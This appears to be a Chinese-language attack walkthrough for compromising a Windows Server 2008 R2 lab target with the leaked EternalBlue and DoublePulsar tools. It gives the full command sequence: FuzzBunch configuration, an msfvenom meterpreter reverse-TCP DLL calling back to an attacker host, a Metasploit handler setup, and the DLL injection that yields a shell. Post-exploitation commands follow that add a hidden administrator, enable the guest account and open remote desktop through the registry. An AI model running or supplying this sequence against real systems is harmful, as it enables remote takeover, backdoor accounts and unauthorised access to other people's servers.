所需工具

目标机器: 192.168.100.123  Windows Server 2008 R2

攻击机1: 192.168.8.117 Windows Server 2012

攻击机2:192.168.8.119 Kali Linux

第一步

安装好python2.6.1以及pywin32

使用cmd进入~\NSA\windows目录

输入fb.py

配置输入好靶机IP以及攻击机1的IP

注意! : Use Redirection [yes] : 这里要选no

配置好project信息

输入

fb > use Eternalblue

一路回车至

\[\*\] Mode :: Delivery mechanism

\*0) DANE Forward deployment via DARINGNEOPHYTE
1) FB Traditional deployment from within FUZZBUNCH

此处选择 1

继续回车可得到结果

攻击机1闲置,开始操作攻击机2

msfvenom -p windows/x64/meterpreter/reverse\_tcp LHOST=192.168.8.119 LPORT=5555 -f dll > /opt/win.dll

即在攻击机2 /opt目录下得到恶意dll–> win.dll

将win.dll转移到攻击机1上

接下来进入 msfconsole

use exploit/multi/handler
set lhost 192.168.8.119
set lport 5555

set payload windows/x64/meterpreter/reverse\_tcp
run

出现

[*] Started reverse TCP handler on 192.168.8.119:5555
[*] Starting the payload handler...

进入下一步

在攻击机1上输入

use Doublepulsar

回车至出现

Function :: Operation for backdoor to perform

选择2 Run DLL

并输入dll在攻击机1上的位置

回车至

[+] Doublepulsar Succeeded

此时在攻击机2上已获得SHELL

攻击完成!

 

后续提权操作:

net user username password /add   //添加用户
net localgroup administrators username /add  //将用户加入administrators权限组
net user guest /active:yes  //激活guest账户
REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /v fDenyTSConnections /t REG\_DWORD /d 00000000 /f  //开启远程桌面连接服务,会丢失连接